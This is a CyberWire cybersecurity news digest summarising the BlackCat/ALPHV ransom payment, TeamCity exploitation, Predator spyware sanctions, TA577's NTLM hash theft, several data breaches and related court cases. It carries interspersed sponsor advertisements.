By the CyberWire staff
At a glance.
- BlackCat/ALPHV ransomware gang receives $22 million payment.
- TeamCity flaw is undergoing widespread exploitation.
- US government sanctions Predator spyware operators.
- TA577 steals NTLM hashes.
- Evasive Panda leverages Monlam Prayer Festival to target Tibetans.
- South Korea's semiconductor industry targeted by DPRK.
- American Express discloses third-party data breach.
- Play ransomware group leaks Swiss government data.
BlackCat/ALPHV ransomware gang receives $22 million payment.
WIRED reports that BlackCat/ALPHV, the ransomware-as-a-service operation responsible for the attack against UnitedHealth Group's Change Healthcare platform, on March 1st received a payment of 350 bitcoins (approximately $22 million). The Register says UnitedHealth Group declined to say whether it paid the ransom. ALPHV said on its leak site last week that it had stolen six terabytes of sensitive data from Change Healthcare and its partners, but has since removed the post.
The Register also notes that ALPHV may be pulling an exit scam with the $22 million. Recorded Future researcher Dmitry Smilyanets says someone claiming to be the affiliate behind the Change Healthcare attack posted on an underground forum saying that ALPHV suspended their account and then "emptied the wallet and took all the money."
The Washington Post has published a summary of the impacts of the Change Healthcare attack. Molly Smith, group vice president for public policy at the American Hospital Association, stated, "Our assessment is that this is the most significant attack on the health-care system in U.S. history."
Team Cymru’s Threat Intelligence solutions allow you to aim your sights on the malicious actors.
Imagine a world where you're always one step ahead of cyber threats, where your defenses are impenetrable because you see what others don't. With real-time access to the worlds largest threat intelligence data ocean, we enable you to turn the tables on attackers. Transform your security from reactive to proactive through accelerated threat hunting and incident response, made possible through automation. Team Cymru: be the hunter, not the hunted.
TeamCity flaw is undergoing widespread exploitation.
Rapid7 describes two authentication bypass vulnerabilities (CVE-2024-27198 and CVE-2024-27199) affecting JetBrains TeamCity CI/CD server. JetBrains issued patches for the flaws on Sunday. Rapid7 notes that CVE-2024-27198 has been assigned a CVSS base score of 9.8 and can allow "for a complete compromise of a vulnerable TeamCity server by a remote unauthenticated attacker, including unauthenticated RCE." The Register reports that the vulnerabilities are already being exploited.
BleepingComputer reports that CVE-2024-27198 is being widely exploited to create administrator accounts on vulnerable hosts. "Exploitation appears to be massive, with hundreds of new users created on unpatched instances of TeamCity exposed on the public web," BleepingComputer says. The Register reports that at least one ransomware group has been observed targeting the vulnerability.
US government sanctions Predator spyware operators.
The US Treasury Department has sanctioned two individuals and five entities associated with Intellexa, a set of European companies that develops and sells the Predator spyware, which Treasury says has been "used to target Americans, including U.S. government officials, journalists, and policy experts." The Treasury Department said in a press release, "The Intellexa Consortium, which has a global customer base, has enabled the proliferation of commercial spyware and surveillance technologies around the world, including to authoritarian regimes. Furthermore, the Predator spyware has been deployed by foreign actors in an effort to covertly surveil U.S. government officials, journalists, and policy experts."
Researchers at Recorded Future's Insikt Group found that the operators of the Predator spyware have rebuilt their infrastructure and are targeting mobile devices in at least eleven countries. The spyware temporarily went quiet last year following a wide-ranging investigation into its operations coordinated by European Investigative Collaborations. Insikt Group states, "This infrastructure is believed to be in use in at least eleven countries, including Angola, Armenia, Botswana, Egypt, Indonesia, Kazakhstan, Mongolia, Oman, the Philippines, Saudi Arabia, and Trinidad and Tobago. Notably, this is the first identification of Predator customers in Botswana and the Philippines. Despite being marketed for counterterrorism and law enforcement, Predator is often used against civil society, targeting journalists, politicians, and activists, with no specific victims or targets currently identified in this latest activity."
What’s your back-up plan if your IDP goes down?
Join the next Identity Orchestration workshop and see exactly how you can build the right failover into every app. During an outage, your team needs access to mission-critical apps to keep getting the job done until order is restored. Strata helps you build the appropriate failover into every app — without a dedicated IDP or a complex process — so your essential apps stay on, no matter what. Don’t miss out!
TA577 steals NTLM hashes.
Proofpoint says the cybercriminal group TA577 is using a new attack chain to steal NT LAN Manager (NTLM) authentication information: "Proofpoint identified at least two campaigns leveraging the same technique to steal NTLM hashes on 26 and 27 February 2024. Campaigns included tens of thousands of messages targeting hundreds of organizations globally. Messages appeared as replies to previous emails, known as thread hijacking, and contained zipped HTML attachments."
The HTML attachments are tailored to each victim and are designed to connect to attacker-controlled SMB servers: "When opened, the HTML file triggered a system connection attempt to a Server Message Block (SMB) server via a meta refresh to a file scheme URI ending in .txt. That is, the file would automatically contact an external SMB resource owned by the threat actor. Proofpoint has not observed malware delivery from these URLs, instead researchers assess with high confidence TA577’s objective is to capture NTLMv2 Challenge/Response pairs from the SMB server to steal NTLM hashes based on characteristics of the attack chain and tools used."
Evasive Panda leverages Monlam Prayer Festival to target Tibetans.
ESET says the China-aligned threat actor Evasive Panda is targeting Tibetans with Trojanized versions of Tibetan language translation software. The threat actor also compromised a website belonging to the organizer of the annual Monlam Prayer Festival in order to launch watering-hole attacks. The researchers note, "The attackers aimed to deploy malicious downloaders for Windows and macOS to compromise website visitors with MgBot and a backdoor that, to the best of our knowledge, has not been publicly documented yet; we have named it Nightdoor."
South Korea's semiconductor industry targeted by DPRK.
South Korea's National Intelligence Service (NIS) says two of the country's semiconductor companies were breached by North Korean hackers in December 2023 and February 2024, the Record reports. The hackers stole "product design drawings and facility site photos." The NIS believes North Korea wants to build up its own domestic semiconductor industry to bypass international sanctions.
What’s your back-up plan if your IDP goes down?
Join the next Identity Orchestration workshop and see exactly how you can build the right failover into every app. During an outage, your team needs access to mission-critical apps to keep getting the job done until order is restored. Strata helps you build the appropriate failover into every app — without a dedicated IDP or a complex process — so your essential apps stay on, no matter what. Don’t miss out!
GhostSec cybercriminal group teams up with Stormous ransomware gang.
Cisco Talos warns that the GhostSec cybercriminal group is deploying a new Golang variant of its GhostLocker ransomware. The group has also worked with the Stormous ransomware gang to launch "several double extortion attacks using the GhostLocker and StormousX ransomware programs against the victims in Cuba, Argentina, Poland, China, Lebanon, Israel, Uzbekistan, India, South Africa, Brazil, Morocco, Qatar, Turkiye, Egypt, Vietnam, Thailand, and Indonesia." The two groups have launched a joint ransomware-as-a-service operation called "STMX_GhostLocker."
American Express discloses third-party data breach.
American Express has disclosed a third-party data breach affecting a service provider used by its travel services division, BleepingComputer reports. The incident exposed credit card numbers, names, and card expiration dates. American Express said in a breach notification, "We became aware that a third party service provider engaged by numerous merchants experienced unauthorized access to its system. Account information of some of our Card Members, including some of your account information, may have been involved. It is important to note that American Express owned or controlled systems were not compromised by this incident, and we are providing this notice to you as a precautionary measure."
Play ransomware group leaks Swiss government data.
Switzerland’s National Cyber Security Centre (NCSC) has disclosed that the Play ransomware gang leaked 65,000 government documents belonging to the Swiss government, some of which included classified information and sensitive personal data, the Record reports. The documents were stolen during an attack against IT provider and government contractor Xplain in May 2023. The NCSC says most of the government-related files belonged to the Federal Department of Justice and Police (FDJP), including the Federal Office of Justice, Federal Office of Police, State Secretariat for Migration, and the internal IT service centre ISC-FDJP.
Experience the ultimate cloud security challenge.
Put your cloud security skills to the test in a virtual game of Capture the Flag. Join Lacework in this interactive and gamified learning session, where you’ll dive into challenges simulating real-world investigations and threat-hunting scenarios. Plus, the top three scorers will receive a Valve Steam Deck. Attendance is limited, so register now to secure your spot.
Crime and punishment.
A Chinese national hired by Google in 2019 has been charged in the US District Court for the Northern District of California with "four counts of theft of trade secrets in connection with an alleged plan to steal from Google LLC (Google) proprietary information related to artificial intelligence (AI) technology," Infosecurity Magazine reports. The Justice Department alleges that Linwei Ding "transferred sensitive Google trade secrets and other confidential information from Google’s network to his personal account while secretly affiliating himself with PRC-based companies in the AI industry." Specifically, "the technology Ding allegedly stole involves the building blocks of Google’s advanced supercomputing data centers, which are designed to support machine learning workloads used to train and host large AI models."
Courts and torts.
A California court has ordered Israeli spyware vendor NSO Group to turn over the source code of its Pegasus tool as part of discovery in a lawsuit by WhatsApp, the Record reports. Judge Phyllis Hamilton stated, "The court rejects defendants’ argument that their production should be limited to the installation layer of the alleged spyware, and instead concludes that defendants must produce information concerning the full functionality of the relevant spyware. The complaint contains numerous instances alleging not only that spyware was installed on users’ devices, but also that information was accessed and/or extracted from those devices."